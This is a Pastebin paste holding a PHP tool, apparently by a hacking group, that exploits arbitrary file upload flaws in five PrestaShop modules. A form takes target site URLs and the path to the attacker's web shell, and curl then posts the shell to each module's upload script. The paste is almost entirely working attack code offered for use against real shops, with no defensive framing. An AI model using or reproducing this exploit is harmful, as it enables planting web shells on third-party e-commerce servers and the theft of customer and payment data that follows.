Advertisement
AZZATSSINS_CYBERSERK

Prestashop AFU

Jul 1st, 2016
277
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.63 KB | None | 0 0
  1. <title>Prestashop AFU</title><body bgcolor=silver><center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a href=mailto:cyberserkers@gmail.com>AZZATSSINS CYBERSERKERS</a></b></i></div><br><br><br><form method="post">Target  : <input type="text" class="input" name="sites" size="10" value="http://target.mu/path"><br>Your Shell  : <input type="text" class="input" name="file" size="10" value="shell/x.php"><br>
  2. Module : <select name="module">
  3. <option value="attributewizardpro/file_upload.php">Attribute Wizard</option>
  4. <option value="simpleslideshow/uploadimage.php">Simple Slide Show</option>
  5. <option value="productpageadverts/uploadimage.php">Product Page Advert</option>
  6. <option value="homepageadvertise/uploadimage.php">Home Page Advertise</option>
  7. <option value="columnadverts/uploadimage.php">Column Adverts</option>
  8. <br>
  9.  
  10. <input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:#fff;border:0;font-weight:bold;" value="EXECUTE" type="submit"><br><br></form></center>
  11. <?php
  12. $e=explode("\n",$_POST['sites']);
  13. $file = $_POST['file'];
  14. $modul = $_POST['module'];
  15. foreach($e as $sites){
  16. $post = array("userfile" => "@$file",
  17. );
  18. $azzatssins = $sites."/modules/".$modul;
  19. $ch2 = curl_init ($azzatssins);
  20. curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
  21. curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
  22. curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
  23. curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
  24. curl_setopt ($ch2, CURLOPT_POST, 1);
  25. curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
  26. $data = curl_exec ($ch2);
  27. echo $data."\n\n\n";
  28. }
  29. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement